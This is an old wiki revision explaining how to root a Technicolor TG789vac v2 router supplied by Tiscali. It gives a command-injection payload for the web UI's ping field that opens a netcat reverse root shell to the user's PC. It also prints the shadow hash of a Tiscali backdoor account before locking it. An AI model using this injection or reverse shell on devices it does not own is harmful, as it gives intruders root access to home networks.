This is an old revision of the document!
Table of Contents
Rooting the router Technicolor TG789vac v2
This router DSL/FTTH Home router is running OpenWRT, it can bee rooted with few simple commands.
I tested the following procedure on a model shipped by Tiscali, an Italian Service Provider.
Product Vendor | Technicolor |
---|---|
Product Name | MediaAccess TG789vac v2 |
Software Version | 16.3 |
Firmware Version | 16.3.7636-2921002-20170419153951 |
Bootloader Version | 2.0.85 |
Hardware Version | VANT-6 |
The router default IP address is 192.168.1.1 (beware that it has a DHCP server enabled), web access is with admin login and admin password.
You need a PC connected on the same LAN (I used a GNU/Linux box), issue the following command on the PC:
nc -lvvp 1025
this will bind the TCP port 1025 and start listening for an incoming connection.
On the router you have to navigate the Dignostic tile, then the Ping & Traceroute tab. Inside the IP Address text input, write the following command just before clicking the Send Ping Request button:
:::::::;nc 192.168.1.46 1025 -e /bin/sh
the IP address must be the one of your PC. On the PC you will get a root shell. Use the passwd command to change the root password:
passwd Changing password for root New password: MySecret Retype password: MySecret Password for root changed by root
Finally you have to permaently enable the ssh access for the root user (but only from the LAN interface), copy and paste the following commands exactly:
sed -i.save 's#root:/bin/false#root:/bin/ash#' /etc/passwd sed -i.save 's/0/1/' /etc/config/dropbear sed -i 's/off/on/' /etc/config/dropbear sed -i "s/wan/lan/" /etc/config/dropbear /etc/init.d/dropbear restart
OpenWRT
The installed OpenWRT will fetch packages from this URL:
http://downloads.openwrt.org/chaos_calmer/15.05.1/brcm63xx-tch/VANTF/packages/Packages.gz
which indeed brigs the Not Found error.
The Tiscali Backdoor
Once you got ssh access to the rotuer, you can confirm that there is a Tiscali backdoor, just look at the /etc/passwd file:
tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash
and at the /etc/shadow one:
tiscali:$1$CEK1lG1Q$bcHMHT6KEzDvKJ8ODFyCB0:17275:0:99999:7:::
The password is unknown, but it is an high security risk to have that account enabled on the Wan side (as it was the Dropbear SSH server, per default). Tiscaly surely knows that password, may be also some bad guy alread had cracked it, but you are not able to change or disable it.
This is enough to justify your right to have root privileges, and use them to lock-down the tiscali backdoor:
passwd -l tiscali